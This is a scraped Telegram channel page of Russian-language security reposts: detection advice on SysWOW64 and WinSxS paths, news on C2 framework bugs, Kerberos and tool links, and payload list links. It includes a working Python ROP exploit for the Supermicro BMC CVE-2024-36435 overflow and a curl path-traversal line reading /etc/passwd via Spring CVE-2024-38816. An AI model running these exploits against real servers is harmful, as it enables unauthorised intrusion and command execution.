Fsecurity | HH
الذهاب إلى القناة على Telegram
👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb
إظهار المزيد2 061
المشتركون
لا توجد بيانات24 ساعات
-67 أيام
-630 أيام
أرشيف المشاركات
2 061
Repost from Blue (h/c)at Café
💊 Небезопасная совместимость
🖋 Пост преимущественно рассчитан на соковцев, но и остальным полезно знать. Только не красным, им эти знания ни к чему, разве что мне работы добавят
🍞 Есть у микромягких такое качество как "Забота о пользователях". Верите? Вот и я нет.
Тем не менее существует такой механизм как
WOW64 (Windows-on-Windows 64-bit). Он даёт возможность 32-битным приложениям запускаться на 64-битной системе, перенаправляя их запросы, если таковые имеются, от файлов в папке System32, к соответствующему файлу в SysWOW64.
👍 Соответственно при написании правил корреляции с привязкой к директориям,
вроде C:\Windows\System32\, надо не забывать про артефакты, которые нам подкидывает такая обратная совместимость, а именно:
1. C:\Windows\SysWOW64\certutil.exe 2. C:\Windows\SysWOW64\schtasks.exe 3. C:\Windows\SysWOW64\cmd.exe☹️ И так далее. Даже если мы отслеживаем запуск утилит по их путям по умолчанию, то в легкую можем проморгать запуск их из подобных мест. 📕 Раз уж заговорили про "подобные места" - то же самое необходимо помнить и про механизм
WinSxS (Windows Side by Side). Данный раздел предназначен не для совместимости 32 и 64 битных приложений, а уже скорее для хранения различных версий системных файлов и библиотек и обеспечения стабильность системы при одновременной работе множества приложений, требующих разные версии одних и тех же библиотек.
Но мы здесь за другим - принцип тот же, но вот пути уже могут быть уникальными, но необязательно. Если кратко, то на двух устройствах с идентичными версией Windows, обновлениями и компонентами пути будут совпадать. Пример:
1. C:\Windows\WinSxS\wow64_microsoft-windows-commandprompt_31bf3856ad364e35_10.0.19041.4355_none_0a1b90d903f78201\cmd.exe 2. C:\Windows\WinSxS\wow64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.3996_none_e7e7d1c1ebfac592\powershell.exe⬇️ И таких примеров сильно больше, чем я указал. Более подробно об этом можно посмотреть здесь - Доклад с PHD2 #blueteam
2 061
Repost from PurpleBear
В своем докладе на прошедшем этой весной киберфестивале
Positive Hack Days Fest 2 я рассказывал о том, почему важно обеспечивать комплексный подход к безопасности атакующей инфраструктуры. В том числе упоминал о серьезных узявимостях в различных С2 фреймворках с открытым исходным кодом.
В продолжении этой темы, мне на глаза попалась статья - Vulnerabilities in Open Source C2 Frameworks, в которой автор рассмотрел найденные баги для популярных и не очень С2 фреймворков:
🔴 Sliver
Когда-то давно был моим фаворитом, а теперь там нашли довольно прикольную багу CVE-2024-41111 - RCE on the teamserver by a low-privileged operator, по сути command injection в аргумент для msfvenom, который Sliver использует для генерации msf stagers.
🔴 Havoc
Набирающий популярность фреймворк на Go c 3 багами: CVE-2024-41570 - Unauthenticated SSRF, Authenticated Command Injection, Service API Authentication Bypass (детали в статье).
🔴 Ninja С2, фреймворк на основе ликнутых исходников иранской APT Muddywater, отметился RCE через Unauthenticated Arbitrary File Download via path traversal веб сервера инструмента.
🔴 SHAD0W
Unauthenticated RCE - еще одна интересная бага, эксплуатация которой заключается в том, что Situational awareness данные об архитектуре, домене, версии ОС передаваемые при отстуке beacon'a на сервер, используются в качестве параметра для компиляции модулей пост-эксплуатации.
🔴 Covenant, когда-то тоже был одним из моих фаворитов, подвержен Authenticated Command Injection и повышению привилегий до администратора через UI (детали в статье).
Таким образом, все рассмотренные С2 фреймворки, за исключением Mythic (о котором уже неоднократно писал ранее) подвержены серьезным узявимостям, которые ставят под угрозу безопасность атакующей инфраструктуры и как следствие обеспечивают потенциальным злоумышленникам доступ к данным и инфре тестируемой организации.2 061
Repost from SecuriXy.kz
Мы знаем как админы не любят менять заводские пароли к админкам сереров типа iDrac, iLO и др. И вот вишинка #CVE-2024-36435
с CVSS 9.8 в прошивке BMC компании Supermicro в некоторых материнских платах X11, X12, H12, B12, X13, H13 и B13 (и модулях CMM6).
Неавторизованный пользователь может отправить в интерфейс поддельные данные, которые вызывают переполнение буфера стека и могут привести к произвольному RCE а на BMC.
https://www.binarly.io/blog/cve-2024-36435-deep-dive-the-years-most-critical-bmc-security-flaw
PoC:
# CVE-2024-36435 – Buffer overflow vulnerability in Supermicro BMC IPMI firmware due to unchecked length of user-supplied value
import base64
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# set target and command values
target = "https://192.168.10.53:443/cgi/login.cgi"
command = "touch /tmp/BRLY"
libc_base = 0x76283000 # we try to guess
gadget_1_offset = 0x000D8874 # pop {r0, r1, r2, r3, fp, pc};
gadget_2_offset = 0x001026D4 # mov r0, sp; blx r3;
system_offset = 0x0003C4D4
print(f"Target: {target}")
print(f"Command: {command}")
print()
print(f"libc_base: {libc_base:#x}")
print(f"gadget_1_offset: {gadget_1_offset:#x}")
print(f"gadget_2_offset: {gadget_2_offset:#x}")
print(f"system_offset: {system_offset:#x}")
print()
payload = base64.b64encode(
b"\x00" * 456
+ int.to_bytes(libc_base + gadget_1_offset, 4, "little") # gadget_1
+ b"\x00" * 12
+ int.to_bytes(libc_base + system_offset, 4, "little") # system
+ b"\x00" * 4
+ int.to_bytes(libc_base + gadget_2_offset, 4, "little") # gadget_2
+ command.encode()
).decode()
data = f"name={payload}&pwd=&check=1"
print("Sending requests...")
i = 0
while True:
print(f"Request: '{i}'")
r = requests.post(target, data=data, verify=False)
i += 12 061
Repost from SecuriXy.kz
Spring CVE-2024-38816 Path traversal
Proof of Concept (PoC):
curl http://<HOST>/static/link/%2e%2e/etc/passwd
Affected Spring Products and Versions
Spring Framework:
* 5.3.0 - 5.3.39
* 6.0.0 - 6.0.23
* 6.1.0 - 6.1.12
Older, unsupported versions are also affected2 061
Repost from Proxy Bar
CVE-2024-36435
*
RCE Flaw in Supermicro BMC IPMI Firmware
*
WriteUp
*
POC exploit
#servers #ipmi #rce
2 061
Repost from Pentest HaT
✔️ Kerberos, again
Заключительная, 4 часть из серии публикаций о протоколе Kerberos, начиная с основ и до различных методов эксплуатации. Весь материал представлен на английском языке.
🔗 Kerberos IV - Delegations
🔗 1 часть
🔗 2 часть
Software:
😹 Kerbrute
😹 hashcat
😹 impacket
😹 Rubeus
😹 mimikatz
😹 keytab.py
😹 gettgtpkinit.py
🦈 Wireshark
#kerberos
✈️ // Pentest HaT 🎩
2 061
Repost from AP Security
#pentest #tools
Обновление NativeDump - BOF (Beacon Object Files)
Применимо для Cobalt Strike, TrustedSec's COFFLoader и Meterpreter's bofloader module.
Ознакомиться с утилитой можно по следующей ссылке
2 061
Repost from AppSec Journey
Однозначно, лишним не будет. Описание того, как можно повысить привилегии в разных ОС и не только) а мы помним - хороший защитник - хороший аттакер☺️
2 061
Repost from Кибер ПТУ | Кибербезопасность
Пэйлоад тайм
Что такое payload (в двух словах) можно почитать вот тут – ссылка. Ну а для тех, кто в курсе, ловите аж несколько сборников таких пэйлоадов. Для АппСеков и пентестеров – мастхэв 👇
🔒 Payloads All The Things (фаворит всего списка) – раз и два
🔒 Payload для XSS (Payload Box) – ссылка
🔒 Payload для SQLi (Payload Box) – ссылка
🔒 Payload для XXE (Payload Box) – ссылка
🔒 Payload для LFI | RFI (Payload Box) – ссылка
🔒 Payload для Command Injection (Payload Box) – ссылка
#AppSec #Pentest
Твой Пакет Знаний | Кибербезопасность
2 061
Repost from AP Security
#pentest #exploit
Microsoft Office NTLMv2 Disclosure (CVE-2024-38200)
Эксплойт включает в себя использование 302 редиректа и злоупотребление неправильными конфигурациями GPO для перехвата хэшей NTLMv2 по SMB и HTTP.
В свою очередь, компания Microsoft предупредила об уязвимости, затрагивающей различные версии Office, которая может раскрыть хеши NTLM удаленному злоумышленнику.
Проблема получила идентификатор CVE-2024-38200 и описывается как уязвимость раскрытия информации, позволяющая неавторизованным лицам получить доступ к защищенным данным. Сообщается, что баг затрагивает несколько 32- и 64-битных версий Office, включая Office 2016, Office 2019, Office LTSC 2021 и Microsoft 365 Apps for Enterprise.
Хотя по оценке Microsoft эксплуатация CVE-2024-38200 считается маловероятной, MITRE оценивает проблему иначе и предупреждает, что вероятность эксплуатации уязвимостей такого типа обычно высока.
